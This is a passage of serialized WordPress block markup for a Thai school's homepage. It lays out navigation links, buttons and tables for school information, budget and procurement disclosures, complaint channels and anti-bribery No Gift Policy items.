{\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=484\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=476\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=563\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"link\":\"http://pakhaeng.ssk.in.th/?page_id=469\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_add57c-9d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\" data-type=\"page\" data-id=\"650\">ข้อมูลพื้นฐาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=643\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_95f155-a6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_95f155-a6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=609\" data-type=\"page\" data-id=\"609\">ข้อมูลสิ่งก่อสร้าง</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=656\" data-type=\"page\" data-id=\"656\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_92a3d1-5f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=605\" data-type=\"page\" data-id=\"605\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=496\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=496\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e5e0c341\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":503,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Is-It-a-Gift-Instagram-Post.png\" alt=\"\" class=\"wp-image-503\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"9l7bo6vn\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showTaxonomy\":false,\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"showPagination\":true,\"postsPerPage\":\"2\",\"headingText\":\"วิดีโอกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"headingHide\":false,\"category-terms\":[{\"label\":\"วิดีโอกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%a7%e0%b8%b4%e0%b8%94%e0%b8%b5%e0%b9%82%e0%b8%ad%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#ff6900\"} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=546\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?post_type=popupbuilder&amp;p=328\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=542\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\" data-type=\"page\" data-id=\"355\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=506\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=337\">Q&amp;A</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=566\" data-type=\"page\" data-id=\"566\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong>รายงานผลการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" 